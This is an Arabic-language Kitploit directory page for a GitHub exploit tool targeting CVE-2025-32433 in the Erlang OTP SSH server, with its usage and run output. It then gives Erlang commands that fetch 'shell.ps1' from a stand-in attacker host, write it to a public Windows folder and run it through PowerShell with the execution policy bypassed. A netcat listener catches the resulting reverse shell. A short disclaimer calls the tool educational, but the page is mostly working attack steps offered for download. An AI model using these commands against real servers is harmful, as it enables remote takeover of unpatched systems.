Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433-available-for-windows — CVE-2025-32433-متاح-ل-ضحايا-ويندوز | Kitploit
أدوات/GitHubGitHub/blackcat4347/cve-2025-32433-available-for-windows
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالالقيادة والسيطرةالتعلم والتعليمأداة الوصول عن بعد
GitHubblackcat4347/cve-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows

CVE-2025-32433-متاح-ل-ضحايا-ويندوز

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

CVE-2025-32433

معلومات عن الثغرة الأمنية: https://nvd.nist.gov/vuln/detail/CVE-2025-32433

إثبات المفهوم

root@kitploit:~
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -h
usage: cve-2025-32433.py [-h] [-d] [--host HOST] [--port PORT]

Exploit for CVE-2025-32433 (Erlang OTP SSH server).

options:
  -h, --help           show this help message and exit
  -d, --debug          Print raw response in hex format
  -t, --target TARGET  Target host (default: 127.0.0.1)
  -p, --port PORT      Target port (default: 2222)
  
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] Connecting to SSH server...
[✓] Banner: SSH-2.0-Erlang/5.1.4.7
[*] Sending KEXINIT...
[*] Opening channel...
[?] Shell command: your command
[*] Sending CHANNEL_REQUEST...
[✓] Payload sent.

الحصول على الحمولة

root@kitploit:~
inets:start(), {ok, {_, _, Body}} = httpc:request("http://ip_attack/shell.ps1"), file:write_file("C:/Users/Public/shell.ps1", Body).

أنشئ جلسة استماع netcat وقم بتنفيذ الأمر.

root@kitploit:~
os:cmd("powershell.exe -ExecutionPolicy Bypass -File C:/Users/Public/shell.ps1").

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. المؤلف غير مسؤول عن أي استخدام خاطئ أو ضرر يسببه هذا السكربت.

تنزيل الأداة